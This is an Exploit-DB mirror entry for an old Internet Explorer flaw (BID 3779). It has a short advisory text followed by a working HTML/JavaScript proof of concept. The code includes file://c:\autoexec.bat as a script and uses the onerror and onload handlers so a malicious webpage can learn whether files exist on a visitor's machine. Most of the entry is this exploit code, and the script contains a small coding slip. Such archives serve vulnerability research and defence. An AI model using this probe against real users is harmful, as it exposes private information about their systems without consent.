exploit-db-mirror/exploits/windows/remote/21198.html
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

33 lines
No EOL
905 B
HTML

source: https://www.securityfocus.com/bid/3779/info
Microsoft Internet Explorer is prone to a vulnerability which may disclose sensitive information to a malicious webmaster.
When script code includes a file outside of the document it is embedded in and the file does not exist, the onError event handler will run script if it is enabled. This script can determine whether the file to be included exists or not. This can be used to verify the existence of files on client hosts by creating webpages that include files from the local host using 'file://'.
<html>
<head>
<script language="javascript">
<!--
var fileExists = false;
function yes()
{
alert("the file exists.");
yes = true;
}
function no()
{
if(!fileExists)
{
alert("the file does not exist.");
}
}
window.onerror = yes
window.onload = no
//-->
</script>
<script language="javascript"
src="file://c:\autoexec.bat"></script>
</head>
</html>